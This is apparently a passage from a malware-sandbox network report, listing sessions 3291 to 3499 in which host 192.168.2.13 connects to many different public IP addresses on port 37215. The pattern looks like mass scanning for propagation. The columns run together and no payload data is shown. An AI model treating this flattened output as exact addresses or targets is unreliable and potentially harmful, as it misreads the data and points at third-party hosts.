                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3291192.168.2.1357332197.42.18.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3292192.168.2.135456841.121.246.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3293192.168.2.1347422197.12.194.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3294192.168.2.134716241.217.229.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3295192.168.2.135917441.195.83.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3296192.168.2.1359736197.234.23.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3297192.168.2.133404241.183.184.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3298192.168.2.1352832157.58.143.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3299192.168.2.1345946158.53.105.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3300192.168.2.1356106197.52.106.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3301192.168.2.1356044197.9.226.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3302192.168.2.1341270157.103.137.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3303192.168.2.1347006101.243.189.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3304192.168.2.1342888197.8.229.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3305192.168.2.1342184179.43.193.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3306192.168.2.1347798197.18.22.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3307192.168.2.1352860197.254.30.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3308192.168.2.1350104157.21.97.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3309192.168.2.1342742157.222.226.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3310192.168.2.1336132157.74.178.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3311192.168.2.1335708157.144.209.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3312192.168.2.134637041.160.108.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3313192.168.2.133621841.206.189.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3314192.168.2.1347470157.26.56.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3315192.168.2.1340252197.135.61.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3316192.168.2.1347736157.23.123.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3317192.168.2.1355798197.236.234.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3318192.168.2.135961041.88.222.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3319192.168.2.1343180129.243.119.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3320192.168.2.135466441.98.23.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3321192.168.2.1336188197.85.198.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3322192.168.2.1345210197.224.143.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3323192.168.2.133325851.81.229.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3324192.168.2.1358058157.197.68.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3325192.168.2.1344190157.198.43.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3326192.168.2.135199641.144.14.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3327192.168.2.133611835.9.162.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3328192.168.2.135538251.211.153.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3329192.168.2.1344922157.16.15.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3330192.168.2.1354552160.242.221.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3331192.168.2.1354862217.109.161.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3332192.168.2.1336274197.116.190.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3333192.168.2.1337870197.30.149.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3334192.168.2.1342780157.146.134.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3335192.168.2.1349416157.71.51.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3336192.168.2.1351764197.239.15.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3337192.168.2.135250641.169.118.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3338192.168.2.1346488197.112.27.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3339192.168.2.1338002197.63.107.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3340192.168.2.135508235.204.57.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3341192.168.2.134002441.42.93.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3342192.168.2.1360008157.244.216.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3343192.168.2.134688841.181.73.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3344192.168.2.13384602.61.169.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3345192.168.2.135301841.191.93.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3346192.168.2.135869247.122.219.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3347192.168.2.1340684151.85.49.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3348192.168.2.1334190157.129.47.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3349192.168.2.135099070.3.164.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3350192.168.2.1340654157.186.210.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3351192.168.2.1351348157.177.175.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3352192.168.2.135503641.91.209.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3353192.168.2.133768041.183.112.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3354192.168.2.1348720157.84.208.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3355192.168.2.1350944197.238.17.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3356192.168.2.133699641.155.45.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3357192.168.2.1352728197.38.114.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3358192.168.2.136057641.52.39.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3359192.168.2.1349656197.54.41.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3360192.168.2.1334772100.165.45.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3361192.168.2.135166041.167.99.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3362192.168.2.1344788157.16.248.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3363192.168.2.134720841.68.132.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3364192.168.2.134637041.32.1.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3365192.168.2.133656051.121.21.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3366192.168.2.1352286197.171.245.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3367192.168.2.1334614157.203.160.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3368192.168.2.1338496157.249.138.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3369192.168.2.136024212.254.69.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3370192.168.2.1344026157.34.157.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3371192.168.2.1354058108.71.228.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3372192.168.2.135348823.184.225.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3373192.168.2.1355974197.126.161.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3374192.168.2.134597841.77.104.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3375192.168.2.133917045.96.211.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3376192.168.2.1340634144.70.75.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3377192.168.2.135276297.74.221.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3378192.168.2.133717447.13.123.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3379192.168.2.135502641.28.82.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3380192.168.2.135015641.199.193.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3381192.168.2.1350990197.223.230.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3382192.168.2.1358700197.207.112.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3383192.168.2.135408418.93.151.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3384192.168.2.1345854157.231.202.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3385192.168.2.133409041.200.28.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3386192.168.2.1360050197.37.241.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3387192.168.2.133509841.116.219.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3388192.168.2.1333706157.57.202.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3389192.168.2.1334164122.103.212.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3390192.168.2.1353422197.15.192.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3391192.168.2.1344866197.176.222.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3392192.168.2.1333954157.195.66.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3393192.168.2.1338028157.11.198.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3394192.168.2.135437641.214.65.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3395192.168.2.1339110197.230.39.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3396192.168.2.135235037.233.254.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3397192.168.2.133412641.5.210.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3398192.168.2.1351940197.125.194.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3399192.168.2.1335854197.23.248.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3400192.168.2.1333330157.211.204.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3401192.168.2.1340292157.191.83.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3402192.168.2.1344994197.4.129.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3403192.168.2.133932641.47.99.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3404192.168.2.1342462157.18.193.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3405192.168.2.1356980157.78.167.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3406192.168.2.13580365.228.62.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3407192.168.2.134969841.169.216.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3408192.168.2.133961441.162.194.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3409192.168.2.1346424157.56.223.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3410192.168.2.1338412197.203.100.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3411192.168.2.1353574157.123.83.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3412192.168.2.1352056197.217.6.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3413192.168.2.1338042197.129.113.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3414192.168.2.134694241.196.203.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3415192.168.2.136065041.55.58.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3416192.168.2.135879881.86.195.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3417192.168.2.133991084.96.154.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3418192.168.2.1350292157.29.70.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3419192.168.2.1360310197.10.124.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3420192.168.2.134351841.163.139.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3421192.168.2.1349652197.150.190.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3422192.168.2.1359564157.39.166.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3423192.168.2.135490820.42.140.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3424192.168.2.1356546204.247.86.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3425192.168.2.1360028197.241.25.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3426192.168.2.1347194197.241.30.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3427192.168.2.1342106197.23.136.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3428192.168.2.133418441.17.37.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3429192.168.2.1360920197.122.34.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3430192.168.2.1344086157.102.254.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3431192.168.2.133604641.82.111.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3432192.168.2.1336404152.238.133.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3433192.168.2.1355648157.168.11.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3434192.168.2.1351652157.147.52.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3435192.168.2.1338544157.94.226.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3436192.168.2.1335578157.78.89.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3437192.168.2.1359566128.83.60.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3438192.168.2.134087441.130.92.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3439192.168.2.1352142197.194.169.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3440192.168.2.1345736157.67.193.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3441192.168.2.1344728157.56.219.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3442192.168.2.1345170180.56.177.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3443192.168.2.135585241.123.74.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3444192.168.2.1337602197.113.107.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3445192.168.2.1350812143.154.214.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3446192.168.2.1342316197.76.55.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3447192.168.2.1347150157.27.224.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3448192.168.2.134172647.2.193.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3449192.168.2.134405441.39.10.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3450192.168.2.134083820.187.64.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3451192.168.2.1347804197.126.132.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3452192.168.2.1353732157.99.216.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3453192.168.2.134745241.239.92.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3454192.168.2.135874414.237.179.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3455192.168.2.1348144157.254.110.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3456192.168.2.134875818.2.210.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3457192.168.2.1341824157.241.251.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3458192.168.2.135627441.168.132.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3459192.168.2.133804254.254.170.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3460192.168.2.1342840195.196.90.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3461192.168.2.1359098157.13.151.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3462192.168.2.1334548157.190.43.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3463192.168.2.134040441.36.207.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3464192.168.2.1355900157.251.178.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3465192.168.2.1358816157.2.95.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3466192.168.2.1333684131.49.200.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3467192.168.2.1335276197.17.127.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3468192.168.2.133907441.58.241.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3469192.168.2.133709441.208.222.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3470192.168.2.1346214197.27.93.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3471192.168.2.133358441.222.183.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3472192.168.2.1355180140.111.26.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3473192.168.2.1346372157.219.78.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3474192.168.2.134781241.28.144.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3475192.168.2.134084041.49.194.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3476192.168.2.13384942.72.32.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3477192.168.2.133442641.5.13.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3478192.168.2.1343944157.225.124.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3479192.168.2.133845098.173.58.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3480192.168.2.135858641.50.152.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3481192.168.2.1356764197.2.50.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3482192.168.2.1336294157.249.180.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3483192.168.2.1344038157.225.243.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3484192.168.2.1350040157.29.211.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3485192.168.2.1352404197.122.183.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3486192.168.2.1351058157.175.47.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3487192.168.2.1337034157.75.128.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3488192.168.2.135748641.208.141.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3489192.168.2.1333400197.70.16.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3490192.168.2.133972641.178.98.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3491192.168.2.1346178197.252.157.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3492192.168.2.133731841.219.99.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3493192.168.2.133989217.109.137.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3494192.168.2.1354662157.202.45.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3495192.168.2.1358742197.114.54.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3496192.168.2.135147441.196.5.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3497192.168.2.1349606197.95.111.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3498192.168.2.1346192157.197.194.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3499192.168.2.1347974197.51.18.8037215
                                                  TimestampBytes transferredDirectionData


